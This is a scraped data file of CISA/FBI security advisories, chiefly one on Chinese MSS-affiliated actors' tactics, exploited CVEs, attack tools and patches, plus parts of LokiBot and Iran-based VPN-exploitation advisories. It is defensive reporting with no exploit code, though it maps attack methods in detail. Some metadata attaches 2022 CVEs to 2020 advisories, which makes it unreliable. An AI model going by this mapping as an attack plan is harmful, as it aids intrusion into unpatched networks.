](<https://blog.trendmicro.com/trendlabs-security-intelligence/lokibot-impersonates-popular-game-launcher-and-drops-compiled-c-code-file/>)\n\n[[2] Fortinet: Newly Discovered Infostealer Attack Uses LokiBot ](<https://www.fortinet.com/blog/threat-research/new-infostealer-attack-uses-lokibot#:~:text=The%20FortiGuard%20Labs%20SE%20team%20identified%20a%20new,manufacturing%20company%20utilizing%20the%20well%20documented%20infostealer%20LokiBot.>)\n\n[[3] ZDNet: LokiBot Malware Now Hides its Source Code in Image Files](<https://www.zdnet.com/article/lokibot-information-stealer-now-hides-malware-in-image-files/>)\n\n[[4] SecurityWeek: LokiBot and NanoCore Malware Distributed in ISO Image Files](<https://www.securityweek.com/lokibot-and-nanocore-malware-distributed-iso-image-files>)\n\n[[5] Netskope: LokiBot & NanoCore being distributed via ISO disk image files ](<https://www.netskope.com/blog/lokibot-nanocore-iso-disk-image-files>)\n\n[[6] Trend Micro: Attack Using Windows Installer Leads to LokiBot](<https://www.trendmicro.com/en_us/research/18/b/attack-using-windows-installer-msiexec-exe-leads-lokibot.html>)\n\n[[7] BleepingComputer: LokiBot Android Banking Trojan Turns Into Ransomware When You Try to Remove It](<https://www.bleepingcomputer.com/news/security/lokibot-android-banking-trojan-turns-into-ransomware-when-you-try-to-remove-it/>)\n\n[[8] Fortinet: New Loki Variant Being Spread via PDF File](<https://www.fortinet.com/blog/threat-research/new-loki-variant-being-spread-via-pdf-file>)\n\n[[9] Check Point: Preinstalled Malware Targeting Mobile Users](<https://blog.checkpoint.com/2017/03/10/preinstalled-malware-targeting-mobile-users/>)\n\n[[10] BleepingComputer: Loki Trojan Infects Android Libraries and System Process to Get Root Privileges](<https://www.bleepingcomputer.com/news/security/loki-trojan-infects-android-libraries-and-system-process-to-get-root-privileges/>)\n\n[[11] New Jersey Cybersecurity & Communications Integration Cell: LokiBot 
](<https://www.cyber.nj.gov/threat-center/threat-profiles/android-malware-variants/lokibot>)\n\n### Revisions\n\nSeptember 22, 2020: Initial Version|September 23, 2020: Added hyperlink to MS-ISAC\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-10-24T12:00:00", "type": "ics", "title": "LokiBot Malware", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882", "CVE-2022-42475", "CVE-2022-47966"], "modified": "2020-10-24T12:00:00", "id": "AA20-266A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-266a", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-09-23T07:31:00", "description": "### Summary\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) has consistently observed Chinese Ministry of State Security (MSS)-affiliated cyber threat actors using publicly available information sources and common, well-known tactics, techniques, and procedures (TTPs) to target U.S. Government agencies. 
CISA has observed these\u2014and other threat actors with varying degrees of skill\u2014routinely using open-source information to plan and execute cyber operations. CISA leveraged the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK\u00ae) and Pre-ATT&CK frameworks to characterize the TTPs used by Chinese MSS-affiliated actors. This product was written by CISA with contributions by the Federal Bureau of Investigation (FBI).\n\n### Key Takeaways\n\n * Chinese MSS-affiliated cyber threat actors use open-source information to plan and conduct cyber operations.\n * Chinese MSS-affiliated cyber threat actors use readily available exploits and exploit toolkits to quickly engage target networks.\n * Maintaining a rigorous patching cycle continues to be the best defense against the most frequently used attacks.\n * If critical vulnerabilities remain unpatched, cyber threat actors can carry out attacks without the need to develop custom malware and exploits or use previously unknown vulnerabilities to target a network.\n * This Advisory identifies some of the more common\u2014yet most effective\u2014TTPs employed by cyber threat actors, including Chinese MSS-affiliated cyber threat actors.\n\n[Click here](<https://us-cert.cisa.gov/sites/default/files/publications/AA20-258A-Chinese_Ministry_of_State_Security-Affiliated_Cyber_Threat_Actor_Activity_S508C.pdf>) for a PDF version of this report.\n\n### Technical Details\n\nThrough the operation of the National Cybersecurity Protection System (NCPS) and by fulfilling its mission as the national risk advisor, CISA has observed Chinese MSS-affiliated cyber threat actors operating from the People\u2019s Republic of China using commercially available information sources and open-source exploitation tools to target U.S. Government agency networks.\n\nAccording to a recent U.S. 
Department of Justice indictment, MSS-affiliated actors have targeted various industries across the United States and other countries\u2014including high-tech manufacturing; medical device, civil, and industrial engineering; business, educational, and gaming software; solar energy; pharmaceuticals; and defense\u2014in a campaign that lasted over ten years.[[1](<https://www.justice.gov/opa/pr/two-chinese-hackers-working-ministry-state-security-charged-global-computer-intrusion>)] These hackers acted for both their own personal gain and the benefit of the Chinese MSS.[[2](<https://www.justice.gov/opa/pr/two-chinese-hackers-working-ministry-state-security-charged-global-computer-intrusion>)]\n\nAccording to the indictment,\n\n_To conceal the theft of information from victim networks and otherwise evade detection, the defendants typically packaged victim data in encrypted Roshal Archive Compressed files (RAR files), changed RAR file and victim documents\u2019 names and extensions (e.g., from \u201c.rar\u201d to \u201c.jpg\u201d) and system timestamps, and concealed programs and documents at innocuous-seeming locations on victim networks and in victim networks\u2019 \u201crecycle bins.\u201d The defendants frequently returned to re-victimize companies, government entities, and organizations from which they had previously stolen data, in some cases years after the initial successful data theft. In several instances, however, the defendants were unsuccessful in this regard, due to the efforts of the FBI and network defenders._\n\nThe continued use of open-source tools by Chinese MSS-affiliated cyber threat actors highlights that adversaries can use relatively low-complexity capabilities to identify and exploit target networks. In most cases, cyber operations are successful because misconfigurations and immature patch management programs allow actors to plan and execute attacks using existing vulnerabilities and known exploits. 
Widespread implementation of robust configuration and patch management programs would greatly increase network security. It would also reduce the speed and frequency of opportunistic attacks by forcing threat actors to dedicate time and funding to research unknown vulnerabilities and develop custom exploitation tools.\n\n### MITRE PRE-ATT&CK\u00ae Framework for Analysis\n\nIn the last 12 months, CISA analysts have routinely observed Chinese MSS-affiliated actors using the following PRE-ATT&CK\u00ae Framework TTPs.\n\n#### Target Selection and Technical Information Gathering\n\n_Target Selection_ [[TA0014](<https://attack.mitre.org/versions/v7/tactics/TA0014/>)] is a critical part of cyber operations. While cyber threat actors\u2019 motivations and intents are often unknown, they often make their selections based on the target network\u2019s security posture. Threat actors can use information sources such as Shodan, the Common Vulnerabilities and Exposure (CVE) database, and the National Vulnerabilities Database (NVD).[[3](<https://www.shodan.io/>)][[4](<https://cve.mitre.org/>)][[5](<https://nvd.nist.gov/>)]\n\n * Shodan is an internet search engine that can be used to identify vulnerable devices connected to the internet. Shodan queries can also be customized to discover specific vulnerabilities on devices, which enables sophisticated cyber threat actors to use relatively unsophisticated techniques to execute opportunistic attacks on susceptible targets.\n * The CVE database and the NVD contain detailed information about vulnerabilities in applications, appliances, and operating systems that can be exploited by cyber threat actors if they remain unpatched. These sources also provide risk assessments if any of the recorded vulnerabilities are successfully exploited.\n\nThese information sources have legitimate uses for network defense. 
CISA analysts are able to identify Federal Government systems that may be susceptible to exploitation attempts by using Shodan, the CVE database, and the NVD to enrich NCPS information. Unlike threat actors, CISA takes the necessary actions to notify network owners of their exposure in order to prevent an impending intrusion or quickly identify intrusions as they occur.\n\nWhile using these data sources, CISA analysts have observed a correlation between the public release of a vulnerability and targeted scanning of systems identified as being vulnerable. This correlation suggests that cyber threat actors also rely on Shodan, the CVE database, the NVD, and other open-source information to identify targets of opportunity and plan cyber operations. Together, these data sources provide users with the understanding of a specific vulnerability, as well as a list of systems that may be vulnerable to attempted exploits. These information sources therefore contain invaluable information that can lead cyber threat actors to implement highly effective attacks.\n\nCISA has observed Chinese MSS-affiliated actors using the techniques in table 1 to gather technical information to enable cyber operations against Federal Government networks (_Technical Information Gathering_ [[TA0015](<https://attack.mitre.org/versions/v7/tactics/TA0015/>)]).\n\n_Table 1: Technical information gathering techniques observed by CISA_\n\nMITRE ID\n\n| \n\nName\n\n| \n\nObservation \n \n---|---|--- \n \n[T1245](<https://attack.mitre.org/versions/v7/techniques/T1245/>)\n\n| \n\nDetermine Approach/Attack Vector\n\n| \n\nThe threat actors narrowed the attack vectors to relatively recent vulnerability disclosures with open-source exploits. 
\n \n[T1247](<https://attack.mitre.org/versions/v7/techniques/T1247/>)\n\n| \n\nAcquire Open Source Intelligence (OSINT) Data Sets and Information\n\n| \n\nCISA observed activity from network proxy service Internet Protocol (IP) addresses to three Federal Government webpages. This activity appeared to enable information gathering activities. \n \n[T1254](<https://attack.mitre.org/versions/v7/techniques/T1254/>)\n\n| \n\nConduct Active Scanning\n\n| \n\nCISA analysts reviewed the network activity of known threat actor IP addresses and found evidence of reconnaissance activity involving virtual security devices. \n \n#### Technical Weakness Identification\n\nCISA analysts consistently observe targeting, scanning, and probing of significant vulnerabilities within days of their emergence and disclosure. This targeting, scanning, and probing frequently leads to compromises at the hands of sophisticated cyber threat actors. In some cases, cyber threat actors have used the same vulnerabilities to compromise multiple organizations across many sectors. Organizations do not appear to be mitigating known vulnerabilities as quickly as cyber threat actors are exploiting them. CISA recently released an alert that highlighted the top 10 vulnerabilities routinely exploited by sophisticated foreign cyber threat actors from 2016 to 2019.[[6](<https://us-cert.cisa.gov/ncas/alerts/aa20-133a%20>)]\n\nAdditionally, table 2 provides a list of notable compromises by Chinese MSS-affiliated actors within the past 12 months.\n\n_Table 2: Significant CVEs targeted by Chinese MSS-affiliated actors in the last 12 months_\n\nVulnerability\n\n| \n\nObservations \n \n---|--- \n \nCVE-2020-5902: F5 Big-IP Vulnerability\n\n| \n\nCISA has conducted incident response engagements at Federal Government and commercial entities where the threat actors exploited CVE-2020-5902. 
This is a vulnerability in F5\u2019s Big-IP Traffic Management User Interface that allows cyber threat actors to execute arbitrary system commands, create or delete files, disable services, and/or execute Java code.[[7](<https://us-cert.cisa.gov/ncas/alerts/aa20-206a%20>)] \n \nCVE-2019-19781: Citrix Virtual Private Network (VPN) Appliances\n\n| \n\nCISA has observed the threat actors attempting to discover vulnerable Citrix VPN Appliances. CVE-2019-19781 enabled the actors to execute directory traversal attacks.[[8](<https://us-cert.cisa.gov/ncas/alerts/aa20-031a%20>)] \n \nCVE-2019-11510: Pulse Secure VPN Servers\n\n| \n\nCISA has conducted multiple incident response engagements at Federal Government and commercial entities where the threat actors exploited CVE-2019-11510\u2014an arbitrary file reading vulnerability affecting Pulse Secure VPN appliances\u2014to gain access to victim networks. Although Pulse Secure released patches for CVE-2019-11510 in April 2019, CISA observed incidents where compromised Active Directory credentials were used months after the victim organization patched their VPN appliance.[[9](<https://us-cert.cisa.gov/ncas/alerts/aa20-107a%20%20>)] \n \nCVE-2020-0688: Microsoft Exchange Server\n\n| \n\nCISA has observed the actors exploiting CVE-2020-0688 for remote code execution to enable email collection of targeted networks. \n \nAdditionally, CISA has observed Chinese MSS-affiliated actors using the techniques listed in table 3 to identify technical weaknesses in Federal Government networks (_Technical Weakness Identification _[[TA0018](<https://attack.mitre.org/versions/v7/tactics/TA0018/>)]). 
\n\n_Table 3: Technical weakness identification techniques observed by CISA_\n\nMITRE ID\n\n| \n\nName\n\n| \n\nObservation \n \n---|---|--- \n \n[T1288](<https://attack.mitre.org/versions/v7/techniques/T1288/>)\n\n| \n\nAnalyze Architecture and Configuration Posture\n\n| \n\nCISA observed the cyber actors scanning a Federal Government agency for vulnerable web servers. CISA also observed the threat actors scanning for known vulnerable network appliance CVE-2019-11510. \n \n[T1291](<https://attack.mitre.org/versions/v7/techniques/T1291/>)\n\n| \n\nResearch Relevant Vulnerabilities\n\n| \n\nCISA has observed the threat actors scanning and reconnaissance of Federal Government internet-facing systems shortly after the disclosure of significant CVEs. \n \n#### Build Capabilities \n\nCISA analysts have observed cyber threat actors using command and control (C2) infrastructure as part of their cyber operations. These observations also provide evidence that threat actors can build and maintain relatively low-complexity capabilities, such as C2, to enable cyber operations against Federal Government networks (_Build Capabilities _[[TA0024](<https://attack.mitre.org/versions/v7/tactics/TA0024/>)]). CISA has observed Chinese MSS-affiliated actors using the build capabilities summarized in table 4.\n\n_Table 4: Build capabilities observed by CISA_\n\nMITRE ID\n\n| \n\nName\n\n| \n\nObservation \n \n---|---|--- \n \n[T1352](<https://attack.mitre.org/versions/v7/techniques/T1352/>)\n\n| \n\nC2 Protocol Development\n\n| \n\nCISA observed beaconing from a Federal Government entity to the threat actors\u2019 C2 server. \n \n[T1328](<https://attack.mitre.org/versions/v7/techniques/T1328/>)\n\n| \n\nBuy Domain Name\n\n| \n\nCISA has observed the use of domains purchased by the threat actors. 
\n \n[T1329](<https://attack.mitre.org/versions/v7/techniques/T1329/>)\n\n| \n\nAcquire and / or use of 3rd Party Infrastructure\n\n| \n\nCISA has observed the threat actors using virtual private servers to conduct cyber operations. \n \n[T1346](<https://attack.mitre.org/versions/v7/techniques/T1346>)\n\n| \n\nObtain/Re-use Payloads\n\n| \n\nCISA has observed the threat actors use and reuse existing capabilities. \n \n[T1349](<https://attack.mitre.org/versions/v7/techniques/T1349>)\n\n| \n\nBuild or Acquire Exploit\n\n| \n\nCISA has observed the threat actors using a variety of open-source and publicly available exploits and exploit code to compromise Federal Government networks. \n \n### MITRE ATT&CK Framework for Analysis\n\nCISA has observed sophisticated cyber threat actors, including Chinese MSS-affiliated actors, using commercial and open-source tools to conduct their operations. For example, threat actors often leverage internet software repositories such as GitHub and Exploit-DB.[[10](<https://www.GitHub.com%20>)][[11](<https://exploit-db.com%20>)] Both repositories are commonly used for legitimate development and penetration testing and developing open-source code, but cyber threat actors can also use them to find code to enable nefarious actions.\n\nDuring incident response activities, CISA frequently observed Chinese government-affiliated actors using the open-source tools outlined in table 5.\n\n_Table 5: Common exploit tools CISA observed used by Chinese MSS-affiliated actors_\n\nTool\n\n| \n\nObservations \n \n---|--- \n \n[Cobalt Strike](<https://attack.mitre.org/versions/v7/software/S0154/>)\n\n| \n\nCISA has observed the threat actors using Cobalt Strike to target commercial and Federal Government networks. Cobalt Strike is a commercial penetration testing tool used to conduct red team operations. 
It contains a number of tools that complement the cyber threat actor\u2019s exploitation efforts, such as a keystroke logger, file injection capability, and network services scanners. CISA observed connections from a Federal Government agency to multiple IP addresses possibly hosting Cobalt Strike team servers. \n \n[China Chopper Web Shell](<https://attack.mitre.org/versions/v7/software/S0020/>)\n\n| \n\nCISA has observed the actors successfully deploying China Chopper against organizations\u2019 networks. This open-source tool can be downloaded from internet software repositories such as GitHub and Exploit-DB. China Chopper is a web shell hosted on a web server. It is mainly used for web application attacks, and it is configured in a client/server relationship. China Chopper contains security scanners and can be used to upload files and brute-force passwords. \n \n[Mimikatz](<https://attack.mitre.org/versions/v7/software/S0002/>)\n\n| \n\nCISA has observed the actors using Mimikatz during their operations. 
This open-source tool is used to capture account credentials and perform privilege escalation with pass-the-hash attacks that allow an attacker to pass captured password hashes and authenticate to network devices.[[12](<https://www.varonis.com/blog/what-is-mimikatz/%20>)] \n \nThe following sections list the ATT&CK Framework TTPs routinely employed by Chinese government-affiliated actors to conduct cyber operations as observed by CISA analysts.\n\n#### Initial Access \n\nIn the last 12 months, CISA has observed Chinese MSS-affiliated actors use spearphishing emails with embedded links to actor-owned infrastructure and, in some cases, compromise or poison legitimate sites to enable cyber operations.\n\nCISA has observed the threat actors using the _Initial Access_ [[TA0001](<https://attack.mitre.org/versions/v7/tactics/TA0001/>)] techniques identified in table 6.\n\n_Table 6: Initial access techniques observed by CISA_\n\n**MITRE ID**\n\n| \n\n**Name**\n\n| \n\n**Observation** \n \n---|---|--- \n \n[T1204.001](<https://attack.mitre.org/versions/v7/techniques/T1204/001/>)\n\n| \n\nUser Execution: Malicious Link\n\n| \n\nCISA has observed indications that users have clicked malicious links embedded in spearphishing emails that the threat actors sent \n \n[T1566.002](<https://attack.mitre.org/versions/v7/techniques/T1566/002>)\n\n| \n\nPhishing: Spearphishing Link\n\n| \n\nCISA analyzed network activity of a Federal Government entity and concluded that the threat actors sent a malicious email weaponized with links. \n \n[T1190](<https://attack.mitre.org/versions/v7/techniques/T1190>)\n\n| \n\nExploit Public-Facing Application\n\n| \n\nCISA has observed the actors leveraging CVE-2019-19781 to compromise Citrix Application Delivery Controllers. 
\n \nCyber threat actors can continue to successfully launch these types of low-complexity attacks\u2014as long as misconfigurations in operational environments and immature patch management programs remain in place\u2014by taking advantage of common vulnerabilities and using readily available exploits and information.\n\n#### Execution \n\nCISA analysts continue to observe beaconing activity indicative of compromise or ongoing access to Federal Government networks. This beaconing is a result of cyber threat actors successfully completing cyber operations that are often designed around emergent vulnerabilities and reliant on existing exploitation tools, as mentioned in this document.\n\nCISA has observed Chinese MSS-affiliated actors using the _Execution _[[TA0002](<https://attack.mitre.org/versions/v7/tactics/TA0002/>)] technique identified in table 7.\n\n_Table 7: Execution technique observed by CISA_\n\nMITRE ID\n\n| \n\nName\n\n| \n\nObservation \n \n---|---|--- \n \n[T1072](<https://attack.mitre.org/versions/v7/techniques/T1072>)\n\n| \n\nSoftware Deployment Tools\n\n| \n\nCISA observed activity from a Federal Government IP address beaconing out to the threat actors\u2019 C2 server, which is usually an indication of compromise. \n \n#### Credential Access \n\nCyber threat actors also continue to identify large repositories of credentials that are available on the internet to enable brute-force attacks. While this sort of activity is not a direct result of the exploitation of emergent vulnerabilities, it demonstrates that cyber threat actors can effectively use available open-source information to accomplish their goals. 
Further, a threat actor does not require a high degree of competence or sophistication to successfully carry out this kind of opportunistic attack.\n\nCISA has observed Chinese MSS-affiliated actors using the _Credential Access_ [[TA0006](<https://attack.mitre.org/versions/v7/tactics/TA0006/>)] techniques highlighted in table 8.\n\n_Table 8: Credential access techniques observed by CISA_\n\n| MITRE ID | Name | Observation |\n|---|---|---|\n| [T1003.001](<https://attack.mitre.org/versions/v7/techniques/T1003/001/>) | Operating System (OS) Credential Dumping: Local Security Authority Subsystem Service (LSASS) Memory | CISA observed the threat actors using Mimikatz in conjunction with coin miner protocols and software. The actors used Mimikatz to dump credentials from the OS using a variety of capabilities resident within the tool. |\n| [T1110.004](<https://attack.mitre.org/versions/v7/techniques/T1110/004>) | Brute Force: Credential Stuffing | CISA observed what was likely a brute-force attack against Remote Desktop Protocol on a public-facing server. |\n\n#### Discovery\n\nAs with any cyber operation, cyber threat actors must be able to confirm that their target is online and vulnerable\u2014there are a multitude of open-source scanning and reconnaissance tools available to them to use for this purpose. CISA consistently observes scanning activity across federal agencies that is indicative of discovery techniques. 
CISA has observed Chinese MSS-affiliated actors scanning Federal Government traffic using the discovery technique highlighted in table 9 (_Discovery_ [[TA0007](<https://attack.mitre.org/versions/v7/tactics/TA0007/>)]).\n\n_Table 9: Discovery technique observed by CISA_\n\n| MITRE ID | Name | Observation |\n|---|---|---|\n| [T1046](<https://attack.mitre.org/versions/v7/techniques/T1046/>) | Network Service Scanning | CISA has observed suspicious network scanning activity for various ports at Federal Government entities. |\n\n#### Collection\n\nWithin weeks of public disclosure of CVE-2020-0688, CISA analysts identified traffic that was indicative of Chinese MSS-affiliated threat actors attempting to exploit this vulnerability using the _Collection_ [[TA0009](<https://attack.mitre.org/versions/v7/tactics/TA0009/>)] technique listed in table 10.\n\n_Table 10: Collection technique observed by CISA_\n\n| MITRE ID | Name | Observation |\n|---|---|---|\n| [T1114](<https://attack.mitre.org/versions/v7/techniques/T1114>) | Email Collection | CISA observed the actors targeting CVE-2020-0688 to collect emails from the Exchange servers found in Federal Government environments. |\n\n#### Command and Control\n\nCISA analysts often observe cyber threat actors using external proxy tools or hop points to enable their cyber operations while remaining anonymous. These proxy tools may be commercially available infrastructure as a service (IaaS) or software as a service (SaaS) in the form of a web browser promising anonymity on the internet. For example, \u201cThe Onion Router\u201d (Tor) is often used by cyber threat actors for anonymity and C2. Actors carefully choose proxy tools depending on their intended use. 
These techniques are relatively low in complexity and enabled by commercially available tools, yet they are highly effective and often reliant upon existing vulnerabilities and readily available exploits.\n\nCISA has observed Chinese MSS-affiliated actors using the _Command and Control_ [[TA0011](<https://attack.mitre.org/versions/v7/tactics/TA0011/>)] techniques listed in table 11.\n\n_Table 11: Command and control techniques observed by CISA_\n\n| MITRE ID | Name | Observation |\n|---|---|---|\n| [T1090.002](<https://attack.mitre.org/versions/v7/techniques/T1090/002>) | Proxy: External Proxy | CISA observed activity from a network proxy tool to 221 unique Federal Government agency IP addresses. |\n| [T1090.003](<https://attack.mitre.org/versions/v7/techniques/T1090/003>) | Proxy: Multi-hop Proxy | CISA observed activity from Tor that has resulted in confirmed compromises of internet-facing Federal Government agency systems. |\n| [T1573.002](<https://attack.mitre.org/versions/v7/techniques/T1573/002>) | Encrypted Channel: Asymmetric Cryptography | CISA observed activity from Tor that has resulted in confirmed compromises of internet-facing Federal Government agency systems. |\n\n### Mitigations\n\nCISA asserts with high confidence that sophisticated cyber threat actors will continue to use open-source resources and tools to target networks with a low security posture. When sophisticated cyber threat actors conduct operations against soft targets, it can negatively impact critical infrastructure and federal, state, local, tribal, and territorial government networks, possibly resulting in loss of critical data or personally identifiable information.\n\nCISA and the FBI recommend that organizations place an increased priority on patching the vulnerabilities routinely exploited by MSS-affiliated cyber actors. See table 12 for patch information on the CVEs mentioned in this report. 
For more information on vulnerabilities routinely exploited by sophisticated cyber actors, see [CISA Alert: Top 10 Routinely Exploited Vulnerabilities](<https://us-cert.cisa.gov/ncas/alerts/aa20-133a>).\n\n_Table 12: Patch Information for Vulnerabilities Routinely Exploited by MSS-affiliated Cyber Actors_\n\n| Vulnerability | Vulnerable Products | Patch Information |\n|---|---|---|\n| [CVE-2020-5902](<https://nvd.nist.gov/vuln/detail/CVE-2020-5902>) | Big-IP devices (LTM, AAM, Advanced WAF, AFM, Analytics, APM, ASM, DDHD, DNS, FPS, GTM, Link Controller, PEM, SSLO, CGNAT) | [F5 Security Advisory: K52145254: TMUI RCE vulnerability CVE-2020-5902](<https://support.f5.com/csp/article/K52145254>) |\n| [CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>) | Citrix Application Delivery Controller; Citrix Gateway; Citrix SDWAN WANOP | [Citrix blog post: firmware updates for Citrix ADC and Citrix Gateway versions 11.1 and 12.0](<https://www.citrix.com/blogs/2020/01/19/vulnerability-update-first-permanent-fixes-available-timeline-accelerated/>); [Citrix blog post: security updates for Citrix SD-WAN WANOP release 10.2.6 and 11.0.3](<https://www.citrix.com/blogs/2020/01/22/update-on-cve-2019-19781-fixes-now-available-for-citrix-sd-wan-wanop/>); [Citrix blog post: firmware updates for Citrix ADC and Citrix Gateway versions 12.1 and 13.0](<https://www.citrix.com/blogs/2020/01/23/fixes-now-available-for-citrix-adc-citrix-gateway-versions-12-1-and-13-0/>); [Citrix blog post: firmware updates for Citrix ADC and Citrix Gateway version 10.5](<https://www.citrix.com/blogs/2020/01/24/citrix-releases-final-fixes-for-cve-2019-19781/>) |\n| [CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>) | Pulse Connect Secure 9.0R1 - 9.0R3.3, 8.3R1 - 8.3R7, 8.2R1 - 8.2R12, 8.1R1 - 8.1R15; Pulse Policy Secure 9.0R1 - 9.0R3.1, 5.4R1 - 5.4R7, 5.3R1 - 5.3R12, 5.2R1 - 5.2R12, 5.1R1 - 
5.1R15 | [Pulse Secure Out-of-Cycle Advisory: Multiple vulnerabilities resolved in Pulse Connect Secure / Pulse Policy Secure 9.0RX](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101>) |\n| [CVE-2020-0688](<https://nvd.nist.gov/vuln/detail/CVE-2020-0688>) | Microsoft Exchange Servers | [Microsoft Security Advisory: CVE-2020-0688: Microsoft Exchange Validation Key Remote Code Execution Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0688>) |\n\nCISA and the FBI also recommend that organizations routinely audit their configuration and patch management programs to ensure they can track and mitigate emerging threats. Implementing a rigorous configuration and patch management program will hamper sophisticated cyber threat actors\u2019 operations and protect organizations\u2019 resources and information systems.\n\n### Contact Information\n\nTo report suspicious or criminal activity related to information found in this Joint Cybersecurity Advisory, contact your local FBI field office at [www.fbi.gov/contact-us/field](<https://www.fbi.gov/contact-us/field-offices>), or the FBI\u2019s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by e-mail at [CyWatch@fbi.gov](<mailto:CyWatch@fbi.gov>). When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. To request incident response resources or technical assistance related to these threats, contact CISA at [central@cisa.dhs.gov](<mailto:Central@cisa.dhs.gov>).\n\n### References\n\n[[1] U.S. Department of Justice Press Release](<https://www.justice.gov/opa/pr/two-chinese-hackers-working-ministry-state-security-charged-global-computer-intrusion>)\n\n[[2] U.S. 
Department of Justice Press Release](<https://www.justice.gov/opa/pr/two-chinese-hackers-working-ministry-state-security-charged-global-computer-intrusion>)\n\n[[3] Shodan](<https://www.shodan.io>)\n\n[[4] MITRE Common Vulnerabilities and Exposures List](<https://cve.mitre.org>)\n\n[[5] National Institute of Standards and Technology National Vulnerability Database](<https://nvd.nist.gov/>)\n\n[[6] CISA Alert AA20-133A: Top 10 Routinely Exploited Vulnerabilities](<https://us-cert.cisa.gov/ncas/alerts/aa20-133a>)\n\n[[7] CISA Alert AA20-206A: Threat Actor Exploitation of F5 BIG-IP CVE-2020-5902](<https://us-cert.cisa.gov/ncas/alerts/aa20-206a>)\n\n[[8] CISA Alert AA20-031A: Detecting Citrix CVE-2019-19781](<https://us-cert.cisa.gov/ncas/alerts/aa20-031a>)\n\n[[9] CISA Alert AA20-107A: Continued Threat Actor Exploitation Post Pulse Secure VPN Patching](<https://us-cert.cisa.gov/ncas/alerts/aa20-107a>)\n\n[[10] GitHub](<https://www.GitHub.com>)\n\n[[11] Exploit-DB](<https://www.exploit-db.com/>)\n\n[[12] What is Mimikatz: The Beginner's Guide (VARONIS)](<https://www.varonis.com/blog/what-is-mimikatz/>)\n\n### Revisions\n\nSeptember 14, 2020: Initial Version\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-10-24T12:00:00", "type": "ics", "title": "Chinese Ministry of State Security-Affiliated Cyber Threat Actor Activity", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", 
"availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510", "CVE-2019-19781", "CVE-2020-0688", "CVE-2020-5902", "CVE-2022-42475", "CVE-2022-47966"], "modified": "2020-10-24T12:00:00", "id": "AA20-258A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-258a", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-09-23T07:30:36", "description": "### Summary\n\n_This Alert uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK\u00ae) framework. See the [ATT&CK for Enterprise](<https://attack.mitre.org/matrices/enterprise/>) framework for all referenced threat actor techniques._\n\nThis product was written by the Cybersecurity and Infrastructure Security Agency (CISA) with contributions from the Federal Bureau of Investigation (FBI). CISA and FBI are aware of an Iran-based malicious cyber actor targeting several U.S. federal agencies and other U.S.-based networks. Analysis of the threat actor\u2019s indicators of compromise (IOCs) and tactics, techniques, and procedures (TTPs) indicates a correlation with the group known by the names Pioneer Kitten and UNC757. This threat actor has been observed exploiting several publicly known Common Vulnerabilities and Exposures (CVEs) dealing with Pulse Secure virtual private network (VPN), Citrix NetScaler, and F5 vulnerabilities. 
This threat actor used these vulnerabilities to gain initial access to targeted networks and then maintained access within the successfully exploited networks for several months using multiple means of persistence.\n\nThis Advisory provides the threat actor\u2019s TTPs, IOCs, and exploited CVEs to help administrators and network defenders identify a potential compromise of their network and protect their organization from future attacks.\n\n[Click here](<https://us-cert.cisa.gov/sites/default/files/publications/AA20-259A-Iran-Based_Threat_Actor_Exploits_VPN_Vulnerabilities_S508C.pdf>) for a PDF version of this report.\n\n### Technical Details\n\nCISA and FBI are aware of a widespread campaign from an Iran-based malicious cyber actor targeting several industries mainly associated with information technology, government, healthcare, financial, insurance, and media sectors across the United States. The threat actor conducts mass-scanning and uses tools, such as Nmap, to identify open ports. Once the open ports are identified, the threat actor exploits CVEs related to VPN infrastructure to gain initial access to a targeted network. CISA and 